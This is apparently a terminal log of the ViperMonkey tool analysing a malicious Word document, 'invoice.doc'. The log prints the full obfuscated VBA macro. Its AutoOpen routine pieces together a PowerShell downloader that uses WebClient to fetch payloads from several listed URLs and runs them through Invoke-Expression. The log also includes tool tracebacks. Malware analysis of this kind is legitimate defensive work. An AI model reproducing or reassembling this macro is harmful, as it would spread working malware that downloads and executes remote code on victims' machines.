-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Function FDQmvuwLDc (): 57 statement(s)
INFO     parsed Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Module None
  Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
  Function FDQmvuwLDc (): 57 statement(s)

Traceback (most recent call last):
  File "/opt/ViperMonkey-master/vipermonkey/vmonkey.py", line 296, in process_file
    for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'

root@vagrant-ubuntu-trusty-64:/opt# /opt/ViperMonkey-master/vipermonkey/vmonkey.py invoice.doc
vmonkey 0.05 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues

===============================================================================
FILE: invoice.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO LqqtcnpXN.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/LqqtcnpXN'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub AutoOpen()
On Error Resume Next
IItjHHWqQ = (738497 * qXdJEWFzDDWJic * 160010 - kNMWT) + QCBHpEWXLIYZH + Sqr(VMzhjwlH) * (wLDGzldDhiv / 1363119)
bIwhAdfrO = (7181537 * UaoXN * 6070649 - UJJQCwlwZmi) + ruM + Sqr(uEDzjVF) * (XNBifI / 2626298)
PYuKlzKFA = (9114547 * DtJ * 1909904 - OHHtTKfDwEtsp) + DSQYSfzkbVkzC + Sqr(jRLF) * (TnaXPu / 1017319)
Application.Run "lZFUFoiihGosi", GRiZjhOm
sqLjDRQGs = (6881489 * UqiwijmJTIbX * 6371461 - oiVHcvBiNnGYv) + SiwMwi + Sqr(PjWIukFazRTi) * (PmuzPolqcrqG / 7095990)
VqlMOaCCY = (8988170 * wiKvDQVnuHBfnw * 9417706 - szms) + CJOPplCsbl + Sqr(svAhdqnMVDLdU) * (zPRSJ / 414912)
End Sub
Function GRiZjhOm()
On Error Resume Next
wqMWP = (3996302 * EoZFtMqLuiqB * 3003313 - sLdBVAfc) + bHTchaLu + Sqr(MYpawH) * (uoXKXIQt / 7404847)
NJcVEUccmAL = (5321547 * rHpUHcPz * 9599852 - jIljncor) + SMViaLHRBSr + Sqr(qGCUnYrQM) * (BJwKf / 7398333)
kYmkLGECQP = (5339295 * jbCCJLVcOIA * 2119418 - iFztCj) + zEwaWG + Sqr(MiQjV) * (RmQXnwqwLJjQ / 377716)
jaNsCf = tPXNQHij + Mid(GwRJ + "DiiwZvLzPEnhViLqdNgKjV(),'+' ScQ+ScQXvc+Xvc2PqSDC);&(vxp0WB+0WBInScQ+ScQ0WB+0WBvov'+'xp+vxpkvxXvc+Xvc0WB+Xvc+Xvc0WBp'+'+vx0WB+0WBpe-IXvc+XvcteXvc+X'+'vcmvx0WB+0Xvc+XvcWBp)(2PqS'+'D0WB+0WBC);brjmoGhnF" + UjUIK, 14, 179)
XUoPICJAzWi = (1812185 * zCScjLmwIuq * 8084794 - LGljAf) + UKYKzv + Sqr(QQKtMzIwZM) * (QjDfwLCZXjHYo / 1685490)
TPDNzbh = (1531422 * QpiHfkiVfzAiq * 1720145 - jYnkzK) + MMIXXzJsWkED + Sqr(JvFNfBhzAKYjO) * (aAAYIkb / 5526381)
AWISLNXoh = (3368890 * INjMnbQZmRElTa * 999158 - dqLCknJcisVMwT) + jdGFSU + Sqr(MZuwwzR) * (jaTJGkROOUDE / 5896870)
OYQfji = XDwQdDNkbibfCA + Mid(tzciV + "SNwhjZzkzkpa/?h0WB+0WBttpsXScQ+ScQvc+Xvc://www.bl0WB+0WB'+'u0WB+0WBe0WB+0WByac0WB+0WBhtcXvc+X'+'vcha'+'r0WB+0WBte0'+'WB+0WBr.com/DXScQ+ScQvc+XvcIjVX0WB+0WB4U/0WB+0WB'+'v0WBScQ+ScQ+0WBxp0WB+'+'Xvc+Xvc0WB.0XvNPNkpqs" + rpbGFsPouNKUJn, 9, 198)
bdVUwwS = (3198342 * pUcvtiS * 1091214 - jzGfGccrtm) + LLrHVIsWkYO + Sqr(NSSROQR) * (soMGO / 4676338)
iVGmQdzmFU = (6947939 * OIWV * 679608 - IidVZkqwVH) + itMnLOb + Sqr(cqWwkszYj) * (cCsP / 6250099)
iHLobN = (2002652 * ntqhTwTFokiX * 4006564 - uut) + pljtdcMGp + Sqr(FZONCzYUlvIuD) * (wISBOEhHzoqYH / 8873691)
YIuERWh = GEdTBXHNVmdJdm + Mid(mrLK + "XvIr]113+[NMMYdRvzSQaNQCNJpGU" + LutmMfPOrkOPp, 4, 7)
QVGLWaVDM = (4931494 * dsdFXavn * 5612112 - jmBftYIzBWvqT) + vEJVVOCpwurcBU + Sqr(XWHFuQiHfwM) * (wYD / 5238001)
ATkArFD = (7444198 * jJTQaSOq * 8427625 - GnQXoOdznlZj) + wiXJM + Sqr(QsT) * (EUKR / 1365739)
AwNUls = (9306369 * qDYsBrhpNkvE * 7549426 - zAz) + lDICnbzm + Sqr(MCizWCwuVI) * (vnpUwTU / 7812494)
pzwmTSnCD = NUMGazPVR + Mid(VfZIzSv + "wkzwLwOCCDMafnhdnKkzJCDAioQmjzPQhtt0WB+0WBp://0WB+0WBs0WXvc+XvcB+Xvc+Xvc0WBoftedg'+'e0WScQ+ScQB+0WBbScQ+ScQd.com/0WScQ+ScQB+0WB687yc/?0WB+0WBht0WB+0WBtp0WB+0WB://0Sc'+'Q+ScQWB+0WBdulfacoll0WB+0WBScQ+'+'ScQtda.com/rL7jYuDDVV" + nzUJLrlLza, 32, 185)
jzPajkdm = (1340531 * RCBJSGELYji * 4024419 - PjvnszbckT) + frjzpmIi + Sqr(DRkXrV) * (ZjEuUsGomLVOjf / 1269297)
GcEzHDOnwC = (6412524 * iibWHVmYAG * 5862895 - vYvWwBvjZCnkvK) + RuziwkCsNu + Sqr(SLRWUlcrr) * (ZsidLBIcqqb / 9374416)
EiOSdY = (8230971 * dCYhNtf * 6620042 - VjkODhBID) + ssCOElj + Sqr(QWEAVUzsRMudz) * (qQMu / 5218482)
YiGJDdHkO = EFUNuVtjoQw + Mid(OIUmjmYBoGdsc + "zLVLdXlqoGKvaNtlqBcCdtsEdpviKXRepL'+'aCE(Xvc7NZkYm" + wNoETGIGi, 31, 16)
htzPIql = (7224790 * JKw * 7872363 - hXcsVUQ) + swzwrfurh + Sqr(VtiAT) * (INbpmKliKtizsV / 8853445)
CNqDZOW = (9226971 * nvPaWtWrKczav * 8382267 - DijItbriNR) + zAvwLRZzqEEY + Sqr(TFwcimHPCww) * (llCTwN / 360105)
avcJqbEJLsV = (1648109 * vVwLQhAwAbw * 1147380 - oocOAaJYvBwkaf) + furCPCYj + Sqr(QRE) * (SBWz / 1682149)
jaruKt = EuphYdwcboUv + Mid(zPLWVNPQL + "bElikvfsZKibbCJYMjoScQ+ScQqdO0WB+0WBadFILqdleKjXvc+XvcV(20WBScQ+ScQ+0WBPq0WB+0WBasfc.0WB+'+'0WBKjV0WB+0WXvc+XvcScQ+S'+'cjiUL" + oNZVlB, 20, 101)
IsHHvGj = (2582450 * bQsYPFpbC * 5988424 - vmB) + qhIQjiE + Sqr(DFovzBUSbsGUZD) * (qUIGUWDwtAJzB / 392744)
sYqWDzjzP = (4597903 * zXUoSaJpa * 6580787 - aCfjs) + oRwaXkZAHuuq + Sqr(SQD) * (GwFOaP / 2142684)
NlRzd = (3558558 * mKcvNTQKMk * 5358157 - cnu) + LfOzVPwXoZkn + Sqr(OCkIqwPX) * (hbatG / 6172234)
RsPmX = zNqhNawJATzb + Mid(CcQGkwqwQFaw + "GIzvqDaiSSioN((Xvc NfVGC" + WCFufBboiKo, 10, 10)
JCzzBYH = (9080079 * vabzzSoof * 5285015 - SDt) + zHIwkQsUjKOlJ + Sqr(jNzKitIBozPCG) * (Ndww / 1050856)
kuLqpw = (9086843 * TzSKNCGvn * 7131299 - fuwNEHZzjv) + LjiKmGD + Sqr(SfNTP) * (fAQqCF / 157926)
IHSjJa = (2430461 * XLJzYqXFMf * 71729 - ibDQzsbSBRbh) + ZHIJjpSwBLwdGi + Sqr(uaBnOZwY) * (ZDNZtf / 1078907)
uGbHFpPu = LiJLaOjwTKW + Mid(FHojdm + "APTJXpsWGFJsnDKItGitbn+vx0WB+0WBpe'+'vxp+Xvc+Xvcvx'+'pw'+'-'+'o0WB+0WBbjec0WB+0WBvxp+vx0WB+0WScQ+ScQBptvxp) rXvc+Xvcandom0WB+0WB;2PqYY0WB+0WBU 0W'+'B+0WB= .0WB+0WB(v0WB+0WBxpnevxp+vxpwvxp+vxp-o0WB+0WBb0WB+0WBjectv0osm" + hqulpiQAwnYbIQ, 23, 192)
HSHlVSaZnw = (6916314 * ctEVFNBGf * 7585056 - iWzhjOHImL) + TVE + Sqr(wIZVwULCNolL) * (rmlhS / 8498435)
JbKbdw = (9446210 * qlrOblzScZjRP * 3261743 - jKoLSUjszDwRA) + SBdHwGXi + Sqr(WiOk) * (OCtuatFXdji / 4853788)
bcjBIwiFqw = (1236344 * tLfTzsJXFKTKV * 9596232 - RcE) + wivJBrGUvYw + Sqr(XAipvrPRr) * (qwjbPYHUL / 784313)
EwSQQRuiJfA = bAziOvfphqhQ + Mid(nsNF + "zDhpFXinYZpilHhjPEiJcLinVoke-ExpReSSIO'+'n')-rEpLAcE  '2lO',[CHAr]124 -rEpLAcE 'ScQ',[CHAr]AMKBPYlvDCGCsOdw" + bPnSadju, 23, 69)
jGLFpzBAn = (6527105 * PstOnaSOqnBjF * 6415497 - NlqmzmazcDzHLn) + QfNSbQNLZMZH + Sqr(MYtXBNNbCPkFou) * (LoSGaD / 4421268)
vLJKPIDmAsZ = (4221817 * mGizZQa * 4599412 - ilDJcGzZL) + PdMmVw + Sqr(ltShspCakufOBl) * (MbKJNCLMIAsI / 1266062)
GNOALF = (8023150 * TNCaijFwl * 9231623 - isL) + LKcZQkb + Sqr(izahJ) * (AjwlKbRLbG / 1700712)
zhVSfzbowBG = pIOzCdbqYO + Mid(IhvKqIHaNnsWnz + "sodwv(0WB20WBScQ+ScQ+0WBPqnsadScQ+ScQ0WB+'+'Xvc+Xvc0WBas0WB+0W'+'Bd = ScQ+ScQ&(vxpnvxp0WB+0WBXvc+XvcScQ+ScQzjkiHYomkmDHSTUVjMIHcQoSOfZwpOqPDa" + ZciMaMsC, 6, 102)
SpjsKqjl = (218551 * iWQ * 1736849 - CwWi) + jTrS + Sqr(PLU) * (QqwCJLOnzIW / 7215500)
NvMldWE = (3039849 * ozJQQjoCwwzS * 5418801 - TOplNBkJ) + THzrPANHVRi + Sqr(Trz) * (luOsAEqjpUjSk / 4689507)
jFTDq = (2809099 * iPp * 1624567 - rZBkqcB) + VzXqqbGWQjOROC + Sqr(RvXwCaZDBqcuU) * (IKcol / 3815252)
DrrVvDiU = iYNMTTAq + Mid(ifjZprBUcEzv + "fsea0WB+0WBk0WB+0WB;}ca'+'tch{'+'}}0WXvc+XvcB).replacE(([Xvc+Xvcchar]50+Xvc+Xvc[char]80+[char]113),[sTring][char]36).replacE(0WBKjV0WB,[sTring][chScQ+ScQar]34).replacE(([char]76+[chalNmPipNzTEpVESLiaspkmCmzXjVcfFsj" + lPEzhk, 3, 180)
oSfoolGVia = (2635596 * mJIZlcciZF * 3749276 - AusLXazXF) + cUqzpOXYqcjP + Sqr(XFGpOcGF) * (VpfEikYvAp / 5264528)
uZBEdk = (9351841 * oionNLBPrw * 6936243 - UGRllvzk) + zBSkknAucqoZqQ + Sqr(BaPuEPdt) * (jJdGKPubMiphV / 653756)
JETXPNYQqIf = (5614533 * BUPGvzdp * 8820195 - KjEfiVHXEaJ) + kMwMMIbqfXlWD + Sqr(OnzjjnMZEOXjz) * (ZzzCOHj / 458777)
mQMHa = McuwHhNfbr + Mid(ofjo + "PbCchar]1'+'00),0WBbyv0Xvc'+'+XvcWB).replacE(0WBQI20WB,0WBwhtXvc+Xvc0WB).replXvc+'+'XvcacScQ+ScQEScQ+ScQ(0WBvxp0WB,[sXvc+XvcTring][char]Xvc+X'+'vc39) t'+'DXvc+XvcvXvc+Xvc. ( 7NwPSHOME[21]+7kCnjqCZPFERotiltfazuKD" + fzXwwVz, 4, 186)
oRLEN = (1558493 * iYjIvL * 2357063 - QtKZJVRTp) + MNF + Sqr(bItaYuct) * (NFnW / 2832175)
WYGWToKwCT = (2198963 * hcurHijv * 4601162 - qNAcwuLIwaOV) + RAXlzUWzDIPW + Sqr(SNSwYzCjEOt) * (QKbNRkLLpc / 8156570)
YXCGRMbtw = (6909890 * mbBqmFkFMbzqA * 313412 - TDNmiG) + JullXELuqX + Sqr(DmWAsRIIZE) * (iXRjtslODFm / 1074679)
SBazRVnwS = inVNDEmu + Mid(cnGUYXuVhK + "oHWB+0WBxpScQ+ScQ) Sys0WB+0WBt0WB+0WBem.Net.We0WB+0WBXvc+XvcbCl0WB'+'+0WScQ+ScQBie0WB+0WBnt;2PqNSB =0WB+0WB 0WB+0WB2Pq0WB+0WBns0WB+0WBa0WB+0WBda0WBXvc+Xvc+0WBsd0WB+0ScQ+SWtXaOlBku" + hpfI, 3, 168)
mqrbzRS = (5013790 * OUoKSJ * 5296272 - cRhEsoQ) + cimzEPUUz + Sqr(aTZkEdsr) * (htVbIJGffhqZ / 4398299)
qYLzkGvcP = (6098403 * sDp * 5426073 - zATLt) + ItsNDMBzjjH + Sqr(ioz) * (omIzDnWrBnP / 6035918)
vLYvHBY = (8413712 * aJiZBMnSdi * 4739810 - wWkALoOP) + hDtfV + Sqr(ALPwVFCG) * (TEmkvVIdadqAHA / 5493933)
BCqGIlqLC = HEBifuRla + Mid(zOuS + "mwbLrnIpocwOlvbNwYUFR & ((vAriABLe '*mdr*').NaMe[3,11,2]-JoIN'') ( ((' (ScQ InVoScQ+ScQKE-e'+'XPreSLiillhchFCkhQ" + vdVhc, 22, 78)
EuPVDbDajlO = (4448451 * KnUFdhNriLGvI * 2842512 - vYJwkUUWamHiU) + WrBStvaOzq + Sqr(CuCvui) * (bdius / 6546721)
ZasIjpdGDVI = (7494118 * qRtSVCtK * 1527150 - EcPSTha) + ihaSbfD + Sqr(DqCczTfUFJUfUL) * (jubqG / 9197311)
jdjoJL = (1644368 * zTYzE * 9661149 - pOOZwCHf) + kzuNKMv + Sqr(XYqXzpzAujFIaU) * (WjTGQvMGb / 2770067)
CwjviEpA = QbVsGptjpmG + Mid(iCUuPm + "FXmoUTmfTRJrciawRFAbiohjfndKdhIQcvx0ScQ+ScQWB+0WBp + 2PScQ+ScQ0WB+0WBqN0WB+0WBS0WB+0WBB + 0WB+0WB(vxp.exvx'JpPL" + GBdUqYZSBi, 32, 76)
MGXlC = (4346463 * hqGiCLSP * 1838615 - kozAjVkAtuPf) + hzXIkZrQp + Sqr(cNJdtXPNrrz) * (cYDpjmrWcJBN / 4744878)
FRSCPuToA = (5957442 * DipSauCWmW * 8383596 - cdhXodtXwEut) + YTK + Sqr(LwFOsMf) * (YZt / 5044553)
VlnFs = (395433 * TovPsv * 7273075 - kfHhzn) + OCbrCbZmckRBUP + Sqr(zzw) * (bEIIaPhwMZG / 2146148)
UrDBKwXNc = FJBuAkYa + Mid(fHAqYQYEW + "mCNjVvNDChBZVXXcQWScQ+ScQB.n0WB+0Xvc+Xvc'+'WBext(1000WB+0WB00, 282133);0WB+0WB20WB+0'+'WBPqADC0WScQ+ScQB+0WBX 0WB+Xvc+Xvc0WB=0WB+0WBXvc+Xvc ScQ+Sc'+'Qvxp 0WB+0WB http0WB'+'+0WB://y0WB+0WBou0WB+0Xvc+XvcWBr0WB+0WBequXiuJiF" + XsP, 16, 199)
lnIBrN = (948623 * hOzwiCpdwW * 3284357 - juz) + AfOFbQGiN + Sqr(qzGWiBszwv) * (PdpPQCFDcjSY / 9762763)
hrqWYbmI = (884113 * AzFQITjCLs * 4437113 - nPHjvCmkB) + pLOAakzX + Sqr(HREBtrim) * (jbdXtaS / 7847130)
uijXYQJkY = (3908533 * WWMUccKuBHswCn * 3911364 - KiNOrN) + REauSR + Sqr(ilQCBBvzbYiw) * (fbhZpCiPja / 1040128)
ujjCIFcZNi = rFKWSizq + Mid(CSfbtQzffJkMM + "pnvdVjhzddUFvFiQBToStr0WB+0WBLqdOaFW" + FuBcUcNMVZEKO, 16, 17)
NXUutvV = (6864748 * WAEPnYwKLwst * 182062 - ZqqTTGUzZD) + JCclZLcXEtB + Sqr(cqoawWDuY) * (fhzpaNd / 4197381)
XhFDGiU = (4315750 * BfdVVYmkP * 4239187 - nXNNcifXdWILqX) + njkOuiXaczNSF + Sqr(kSiCWrJk) * (wjwwtEsTm / 9638069)
DJcYGBfRLM = (5037120 * CzAbOQzlQPL * 5074744 - sDdITfmDHmfwji) + jdaUini + Sqr(ibIbLwL) * (XXzABOLSSoj / 8986454)
JoXsPHY = JHuQChs + Mid(NZHhzmSUM + "KRCCpcalCOEwUQYljujImNoNOUwpmKtc+XvcWB+0WBSplit(v0WB+0WBxp?vx0WB+0WBp);ScQ+ScQ2PqSDC0WB+0WB =0WB+0Xvc+XvcWB 2Pqenv:public +Xvc+Xvc vxpQI2XvScQ+S'+'cQc+XvScQ+ScEslcCfw" + ojuj, 32, 128)
nbrYLC = (9207751 * pkwZufcoq * 3167376 - iHNObw) + MGuIH + Sqr(UjoEDWfqli) * (qIWJcw / 9136559)
kAzlZ = (7531928 * GnA * 7803229 - iovzpjhcQ) + NrXk + Sqr(kYsYzYT) * (zjJwVEajf / 23716)
wdDjl = (5437091 * ijswwjNr * 3514721 - lZKTShvbpELNvN) + kMYpYhrvLl + Sqr(fwa) * (KbJDzko / 262438)
wCVGUOwBfi = UfilbBmor + Mid(KKkzhLEaEwDIY + "OzlRlJYlal0WB+0WBlet0WB+0WB.nScQ+ScQl/0WB+0WBp1ScQ+ScQXvc+XvcwHk0WB+0WB/?YUtwRKiqhFi" + dUVSHCqGnFJ, 9, 65)
NuITskvBb = (9602598 * NAfLwU * 4936868 - nDGpST) + nCodiRvOWSJD + Sqr(HmOH) * (SEB / 3548133)
rzFGPSu = (8175262 * ZJoEMnHs * 3633801 - zbrt) + wSlJtpR + Sqr(HBpzoAP) * (ULREVdqCiLQk / 9682701)
IurwQ = (1545400 * XNhTl * 3069440 - ziHoj) + XoT + Sqr(DRiPZowVcjbhY) * (WzqSlGjdYL / 2722596)
dSbwhjw = slELXNVnfQOU + Mid(CuPuiwiRCwBW + "cAzGftOKVIwSiNwpShOMe[30]+0WBx0WBXvc+Xvc)Xvc).RepLaCE(XvctDvXvc'+',[STRing][cHar]124).RepLaCE(XvcbyvXvc,[STRing][cHar]96).RepLaCE(Xvc0WBXvc,[STRing][cHar]3ScQ+ScQ9'+').RepLaCE(XvcwhtXvc,Xvc'+'CsmXvc).rOfODUQHGI" + jDsQuwLmzmdjX, 14, 187)
XbaEAskmsIL = (8203844 * SYpDhpzApWuUM * 4376014 - UsiwZWNPZa) + fNHnKuGjRZUd + Sqr(ZJZcKSkpqdFAoC) * (VEJPdq / 1986522)
EVKwZr = (7271367 * CMzOjFIAOfYPz * 7023409 - HpBp) + BmVrpLMQEzJ + Sqr(YjawSW) * (kUFlJ / 5811770)
kTKYWG = (290662 * UDInoVBr * 2923024 - IYUssvPVIrQJ) + oTrE + Sqr(wBMNom) * (MvLUuXoLHKzos / 5443913)
khYpDPEIZEO = wjwmftsZjjdv + Mid(YjwJjhPJaSjMFC + "ClwXvc,[STRing][cHar]36)ScQ+ScQ'+' )ScQ)'+'.repLaCE(([CHaR]88+[CHaR]118+[CHaR]99),[STrING][CHaR]39).repLaCE(([CHaR]67+[CHaR]115+[CHaR]'+'109),[STrING][CHaR]92) 2lOjjRzbHohudchPEZCwiVcJTmw" + LZsSB, 3, 161)
XDlTAWm = (5875751 * DMoniZs * 5768406 - iQcrXimtzi) + NGswJS + Sqr(HpfMzpwtEwH) * (ECGCRPXMikh / 6580955)
mRhCQlpcVH = (77360 * OIwTrdM * 7715931 - ozVSnsdZpmO) + NHEbhlGGW + Sqr(zMca) * (zkFdXPRSDvwk / 3750776)
zLkjo = (305408 * svmuB * 144806 - sJsGhOjCJqMCf) + kJqKwpBfkAmE + Sqr(PBZhZ) * (FrvlRiClAmGX / 3328524)
wqCKwzuB = WnVKHKwT + Mid(zQkuOdu + "PiLCwOUmzcfWents-d.c0WB+0Xvc+XvcWBom/Xvc+Xvcxrm0WB+0Xvc+XvcWBXvc+XvcC0ouYqjEcdDn" + hzfADBOUczz, 13, 58)
MipkARphs = (6722250 * IOiwUiOiXtzFB * 4182825 - CwjEwXTOVILIqU) + OwtJImFMTiLTQ + Sqr(cVrhAqitQ) * (UoAInJVXKdf / 9952586)
vaCXai = (2364504 * NNwjQWkDCktnT * 5221191 - dLUhGoTlwZKM) + JnwcJzTntwct + Sqr(RmP) * (AquihS / 2114636)
iQUjLII = (3486857 * DubA * 2052020 - KwuP) + RdTHCjMroEX + Sqr(WjYURFcUnK) * (wZL / 8719090)
tEDmWzLAjJi = UHmvkELrNY + Mid(TcBQAjJnMazoX + "wWB+0WBrk/'+'?http://0WB+0WBmrXvc+XvcwdCHwzljTFMU" + btDAtidV, 2, 37)
Xwaqz = (4843435 * FwAJsiB * 9522420 - ZiPUjCQLGZ) + jqO + Sqr(cirz) * (EpHjzYDfDMlkoN / 3448514)
dVcnLaAA = (7656756 * iaXHWkQXlO * 6961017 - hNrEwZkWiWHzkI) + oRvcwQzAQasiE + Sqr(JMKSjWwtfqohR) * (HTXWNrbFqmnfjN / 5188816)
DRwhDz = (5796114 * rjiZ * 2040248 - jAluumEoOzBtwC) + UNPDVXi + Sqr(mlSB) * (zBmWwWrWbwh / 3757016)
PAGiG = WiFWXdwWWnfzF + Mid(dBjNFTl + "XYNuwDsOnP39) ) AD" + srSuwHZXiqp, 11, 6)
LTJiYYzVs = (4982010 * aiX * 30444 - wpZc) + FiSHLTDXDQld + Sqr(jmF) * (vXu / 8219959)
EjWviCIwulM = (7516736 * TQipi * 7787103 - VZQccAQSu) + AulJ + Sqr(zjrNCw) * (ChzSYzqjiZiZu / 2233198)
hznXWj = (2445499 * DlpiBSuw * 384422 - DSw) + QmibXifKcQbNba + Sqr(LODlG) * (bMNsknAQXwYi / 6200531)
UZjZBvHTV = wZfiTibkWSOW + Mid(ZBwzIbkTrNMi + "jU0ScQ+ScQWB+0ScQ+ScQWScQ+ScQBScQ+ScvjwjOcipimjlzvcEQnjIYDa" + aLztQijjZFYESo, 3, 34)
SnmizSzVl = (1012974 * DfvSPUv * 2939970 - MuSo) + EtUQ + Sqr(lwqqWTWXk) * (jPw / 741985)
iLNislTiOj = (769814 * IvB * 4131637 - qkaiPWlM) + taOUUYMoY + Sqr(swLNXzwOkDvwTu) * (uLQ / 2283914)
ajnoLjj = (1365626 * lKGHIAijfqUWCd * 4894669 - WCjTHBJhvH) + QZNwcRA + Sqr(mEGP) * (RfEMbbQRiOoNin / 8219228)
RiNbl = wrToitsJ + Mid(GnqTkqmA + "btqHillsbai0WB+0WBpmfCwiEvppnw" + rKoZUinuiu, 11, 10)
picEKcv = (8736193 * QCVmSj * 4462370 - urnXZv) + PnFSsJfcwtL + Sqr(arABvXZTzGJdW) * (cHuXBJCruifNAE / 7110451)
QuYYnQcLl = (5024503 * tGpwXtps * 45087 - bmI) + bvwhXhbsC + Sqr(iwSWhWUiZjQXh) * (FNFiAIaEmEERDW / 2545097)
RchCQkkOri = (8508294 * BEwNabSKdjtNZ * 2598746 - NwcK) + zrtRdKOSQ + Sqr(zVjoPSk) * (ilmTXchrMqz / 738872)
uzKuM = BYMAhOJSurEB + Mid(nbQnjBbw + "FHNLCaCmBhkHwwWiKhWYdDihDwtiX+'0WB+0'+'W'+'Bp+vxpe0WB+0WBvxp);foreac0WB+0Xvc+XvcWBh(0WB+0WB20WB+0WBPqas0WB+0WB'+'f0Xvc+XvcWB+0WBc0WB+0WB inScQ+ScQ 2PqADCX){t0W'+'B+0WBScQ+ScQry{0WB+'+'0WB2PqYYU.KjVDo0WB+0WBLq0WB+0WBdWnlLXvc+XvcGFhAjjC" + GTqClKYizdJWlf, 30, 198)
GRiZjhOm = FDQmvuwLDc + uCPzJKfj + VYZFQcMzarP + ChrW(34) + NAuKiXhkw + BCqGIlqLC + RsPmX + zhVSfzbowBG + uGbHFpPu + SBazRVnwS + UrDBKwXNc + RiNbl + wqCKwzuB + tEDmWzLAjJi + wCVGUOwBfi + UZjZBvHTV + pzwmTSnCD + OYQfji + JoXsPHY + CwjviEpA + uzKuM + jaruKt + ujjCIFcZNi + jaNsCf + DrrVvDiU + YIuERWh + mQMHa + dSbwhjw + YiGJDdHkO + khYpDPEIZEO + EwSQQRuiJfA + PAGiG
ldKzYqdTR = (6992730 * zXSMMDSRrFI * 1081906 - PYl) + NuJKcsNa + Sqr(wiZUqsuwRphhzf) * (Ptsc / 4514312)
IiAEDFXac = (4165112 * FlPHorWOPK * 1064289 - iDrPPEuizkDnNi) + QkVUTvK + Sqr(wiXRYWdMM) * (kRA / 2266839)
qIWimiUib = (8714519 * WGiuq * 7237241 - Xav) + rnVMWXqldM + Sqr(EuNzlJf) * (NGiHC / 3130657)
End Function

-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Sub AutoOpen (): 7 statement(s)
Module None
  Sub AutoOpen (): 7 statement(s)

Function GRiZjhOm()
^
Expected end of text (at char 626), (line:10, col:1)
-------------------------------------------------------------------------------
VBA MACRO fXAmrsMQl.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/fXAmrsMQl'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function VYZFQcMzarP()
On Error Resume Next
XSMEXzO = (1989820 * nIuWFWmiaIEGG * 184422 - SqlIG) + zMCh + Sqr(lNpaTJrkccNHM) * (djBlIpMLCjwNhE / 7443724)
FrjsV = (8114424 * rpLlYsApuOWXhE * 6719556 - McXvatsj) + KFcFcnzm + Sqr(WSAKEqBwNa) * (nViPnVbPuVzw / 6106751)
kuhiSzlWhSi = (2195479 * nXjSbY * 7157752 - iQY) + Yht + Sqr(jSpmpbMSGL) * (sKYVUzqDiN / 9109102)
JBhYa = zBdQlHdRS + Mid(RctNvT + "iProYpRQwh9uz2dAquM" + NBowp, 7, 1)
TLwRYKEC = (4034253 * NDmIAqTGri * 5106673 - rTwjjaI) + lEKSVElaj + Sqr(RoDjz) * (YGqCXD / 711520)
rawJufOnlW = (4848219 * PlwVAkzbr * 8808308 - sTmvF) + ajNlOLWiLckGG + Sqr(AlrGSpFfaT) * (MmnVET / 8887265)
jmMdtrkDvn = (9460461 * dXLpBaampI * 2502016 - kLJHcjd) + nuFuYB + Sqr(iNGIqJcE) * (ZCFrOSqSG / 8538378)
wcQNw = RCUvwOUDiBrRip + Mid(YLKQLPqt + " 2UdizGNIMCMAkj0RpZwVCAfnknCYhGsh^ell&&!%QqzwPcS7" + KuEBhdPRkTYk, 32, 11)
khzwqdNziS = (179384 * DnnjZzE * 9907518 - UZclVKImG) + XtGSkjUTzjCM + Sqr(jVffdkaFmZ) * (iwjW / 7310879)
wuTbsXOLN = (4231899 * nUwdbzUD * 9883559 - dHSb) + uvPp + Sqr(iCfkkUBnnz) * (hbIOriCuiKakVb / 6026529)
tjqSbMPSzIj = (1331864 * WCnGwqulp * 2359607 - HwhQBGwfKNQLs) + HVDRKIF + Sqr(WQkKrl) * (OcCWKnldKiO / 6007726)
TNSWjiaP = aiOcnQhqjSR + Mid(zCrYjz + "WX%SURDEdJuCbofz1YpY2u9WKIu" + LIHjhaal, 3, 8)
qiYnCTXnonU = (6650234 * dGQFKtPFzPYIX * 3668687 - tMMirzUE) + jsB + Sqr(DSdwl) * (ZjdTFlcKNfX / 5468634)
KWmQATG = (8008620 * LoJfPrwI * 288768 - ZRsDCi) + bWotqQtGtOo + Sqr(YdEC) * (BPJwhunQfN / 8886706)
YVnQFbnELSp = (7665032 * ZHitvGBcUYQYW * 5462388 - BcmV) + MBmVnu + Sqr(BcKCwSzph) * (ihzBCjrs / 4990861)
zFnSqfnU = wRGquloVqUiDnt + Mid(QfrPKuvk + "7!UkoPvjkjiLl" + pihVrt, 2, 1)
uHUfWaLlS = (873276 * NKVvcNjJ * 4204314 - IaZuT) + MLYjTCC + Sqr(VbUofFmF) * (BLWBZktR / 4033227)
PWZoMU = (5727599 * BurLDUORZXDL * 1509477 - aAsviQaCDXiwQm) + iPwYOVakJ + Sqr(LqVfzwAODwj) * (VqN / 2478263)
jUhEXF = (9763097 * TcGDbquIFmtd * 9885668 - jKSZFX) + ZhiN + Sqr(riuHLBWjQjfH) * (ilrsNV / 5061358)
dPiDnEDJd = SfPCbZYj + Mid(UNGAizAJ + "nTKwYVpZwKPYqjnGQTj7cICQPvzAw" + RFWmacz, 21, 4)
UTblFLwVobK = (6699033 * XuuzXlHRcjV * 5606564 - miTkTNjNdjpYM) + KDzZCfODw + Sqr(RcSYt) * (uQkmhiTEFA / 513568)
qHGBBWtcJw = (4206139 * NEYKKwNcHSwji * 6388053 - SqvI) + vmZoatc + Sqr(uTBcsJiHsSH) * (jFnzmGwBL / 7292162)
iKNzATa = (2967151 * uCwb * 6100224 - kQUcinQVnZw) + ZYn + Sqr(nqzbCTuaZI) * (whq / 2116055)
